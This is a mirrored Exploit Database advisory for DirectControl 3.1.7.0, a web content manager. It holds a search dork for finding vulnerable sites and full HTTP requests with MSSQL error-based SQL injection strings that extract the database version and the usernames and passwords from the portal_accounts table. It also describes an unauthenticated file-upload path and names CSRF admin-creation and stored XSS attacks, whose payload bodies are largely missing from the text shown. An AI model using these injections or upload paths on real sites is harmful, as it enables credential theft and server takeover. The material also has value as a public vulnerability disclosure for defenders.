DirectControlTM 3.1.7.0 – Multiple Vulnerabilities

Exploit Database
119 阅读

作者： mohamad ch

日期： 2014-01-03
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/30669/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

DirectControlTM Version 3.1.7.0- Multiple Vulnerabilties

====================================================================

####################################################################

.:. Author : AtT4CKxT3rR0r1ST

.:. Contact: [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]

.:. Home : http://www.iphobos.com/blog/

.:. Script : www.directclarity.com

[2]inurl:"/cm/password_retrieve.asp?redir_id=1"

####################################################################

################################

[1] Sql Injection

===================

type: Post String Mssql Injection

extrct version database:

-------------------------

POST /cm/password_retrieve.asp HTTP/1.1

Host: www.server.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101

Firefox/26.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site/cm/password_retrieve.asp

Cookie: __utma=

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 98

redir_id=1&uname=' and+1=cast(@@version as int)--

-&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error

Content-Type: text/html

Cache-Control: private

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date:

Content-Length: 352

redir_id=1&uname=|command|&email_password=Email+My+Password

extrct Username & password:

----------------------------

information:

tablename:portal_accounts

columns: username , password

POST /cm/password_retrieve.asp HTTP/1.1

Host: www.server.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101

Firefox/26.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site/cm/password_retrieve.asp

Cookie: __utma=

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 98

redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)

as int)

-- -&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error

Content-Type: text/html

Cache-Control: private

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date:

Content-Length: 352

username:

redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)

as int)

-- -&email_password=Email+My+Password

password:

redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts)

as int)

-- -&email_password=Email+My+Password

[2] Arbitrary File Upload

==========================

http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images

your file:

http://site/cm/media/images

[3] CSRF [Add Admin]

=====================

<html>

</form>

</body>

</html>

[4] Cross Site Scripting

=========================

Go to:

http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS

Management

and add new channel

put in new channel:

and submit!

####################################################################